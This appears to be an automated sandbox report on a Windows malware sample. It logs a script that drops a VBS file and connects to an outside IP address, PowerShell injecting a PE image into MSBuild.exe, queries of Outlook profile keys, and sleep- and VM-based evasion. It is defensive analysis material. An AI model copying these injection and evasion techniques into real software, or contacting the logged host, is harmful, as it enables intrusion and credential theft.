                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7836" "2812" "2804" "2144" "0" "0" "1284" "0" "0" "0" "0" "0" Jump to behavior
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttpcom.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wer.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: aepic.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_02DF0C53 push ebx; retf 15_2_02DF0C52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_02DF0C45 push ebx; retf 15_2_02DF0C52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_02DF0C6D push edi; retf 15_2_02DF0C7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0695FD38 pushfd ; iretd 15_2_0695FD39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_06AA818B push ss; iretd 15_2_06AA8192
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_06AA8188 push ss; iretd 15_2_06AA818A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_06AA81F8 push ss; iretd 15_2_06AA81FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_06AAE980 push eax; iretd 15_2_06AAE98A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_06AAE903 push eax; iretd 15_2_06AAE90A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_06AAE900 push eax; iretd 15_2_06AAE902
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_06AA7E59 push cs; iretd 15_2_06AA7E5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_06AAFFA3 push ebx; iretd 15_2_06AAFFA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_06AA7DB9 push cs; iretd 15_2_06AA7DBA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_06AA7D89 push cs; iretd 15_2_06AA7D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_06AAFAF0 push es; ret 15_2_06AAFAF4

                  Persistence and Installation Behavior

                  Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbsJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wermgr.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Windows\System32\wscript.exe Dropped file: Do While CompteurIterations < 10000 ' Iteration limit for demonstration WScript.Sleep 10000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2D80000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2F10000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 4F10000 memory reserve | memory write watch
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6022
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3869
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 2601
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 786
                  Source: C:\Windows\System32\wscript.exe TID: 5096 Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\System32\wscript.exe TID: 2912 Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\wscript.exe TID: 5096 Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8108 Thread sleep time: -6456360425798339s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648 Thread sleep time: -11990383647911201s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648 Thread sleep time: -100000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2444 Thread sleep count: 2601 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648 Thread sleep time: -99890s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2444 Thread sleep count: 786 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648 Thread sleep time: -99780s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648 Thread sleep time: -99671s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648 Thread sleep time: -99562s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648 Thread sleep time: -99452s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648 Thread sleep time: -99343s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648 Thread sleep time: -99234s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648 Thread sleep time: -99124s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648 Thread sleep time: -99015s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648 Thread sleep time: -98906s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648 Thread sleep time: -98796s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648 Thread sleep time: -98687s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648 Thread sleep time: -98577s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648 Thread sleep time: -98468s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648 Thread sleep time: -98359s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648 Thread sleep time: -98250s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2648 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 100000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99780
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99671
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99452
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99124Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98577Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: wscript.exe, 00000000.00000003.1263533043.000001B4FBFCF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297074008.000001B4FBF7A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1264311503.000001B4FBFCF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1264429386.000001B4FBF7A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1299870924.000001B4FBFCF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1263929463.000001B4FBF7A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297074008.000001B4FBFCF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1274037561.000001B4FBFCF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1298030719.000001B4FBFCF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297375516.000001B4FBFCF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297375516.000001B4FBF7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: MSBuild.exe, 0000000F.00000002.2511307184.00000000061E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion
Source: C:\Windows\System32\wscript.exe | Network Connect: 144.91.79.54 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1000000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1002000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 103C000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 103E000
